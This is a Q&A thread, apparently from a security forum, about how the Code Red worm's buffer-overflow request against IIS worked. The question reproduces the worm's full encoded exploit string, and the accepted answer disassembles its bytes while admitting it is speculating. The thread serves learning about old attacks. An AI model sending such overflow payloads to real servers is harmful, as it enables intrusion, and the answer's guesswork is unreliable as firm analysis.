# How did the Code Red worm work?

Tags: buffer-overflow, asp.net

So I've been reading a bit about the Code Red worm, and I get the gist but the overflow string doesn't make sense to me.

From [this](http://www.sans.org/security-resources/malwarefaq/code-red.php) site, it says that the overflow string the worm used was

```
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucb
d3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
```

All the 'N's are probably just for the buffer overflow, but what do the letters and % signs mean? If it makes any difference, I don't know any C languages nor ASP.NET

Comment: The hint is to know what `%u9090` is: https://en.wikipedia.org/wiki/Shellcode

Answer (score 5, accepted):

I'm only speculating, but yes the N's are for the initial buffer overflow.  You'll notice that `%u9090%u6858%ucbd3%u7801` is repeated over and over.  These are 8 bytes of unicode values in hexidecimal.

`%u9090` is most likely a `NOP` (no operation) machine instruction.  In hexidecimal for Intel x86 then this instruction is one byte, `0x90`.  So it repeats these 8 bytes 3 times.  The purpose I'm guessing is to overwrite the return address with its own address.

Then you have `%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00`.  Which seems to me that this is the shell code needed to gain execution.  If you remove the unicode designatore `%u` you get a stream of instructions.  Using [radare2](http://www.radare.org/r/) you can run the following command on `90909090819000c300038b00531b53ff00780000`

```
rasm2 -d 90909090819000c300038b00531b53ff00780000
nop
nop
nop
nop
adc dword [eax + 0x300c300], 0x1b53008b
push ebx
inc dword [eax]
js 0x13
.byte 0x00 1
```

Now I could be wrong about the first 3 repeated values.  Maybe they're part of the shellcode.  So lets just run the same command on the full byte string:

```
$ rasm2 -d 90906858cbd3780190906858cbd3780190906858cbd3780190909090819000c300038b00531b53ff00780000
nop
nop
push 0x78d3cb58
add dword [eax - 0x34a79770], edx
sar dword [eax + 1], cl
nop
nop
push 0x78d3cb58
add dword [eax - 0x7e6f6f70], edx
nop
add bl, al
add byte [ebx], al
mov eax, dword [eax]
push ebx
sbb edx, dword [ebx - 1]
add byte [eax], bh
.byte 0x00 1
```

---

To learn more about how buffer overflows work; check out [Why are buffer overflows executed in the direction they are?](https://security.stackexchange.com/a/82846/52676), and [Security implications in neglecting trailing NULL byte.](https://security.stackexchange.com/a/95248/52676)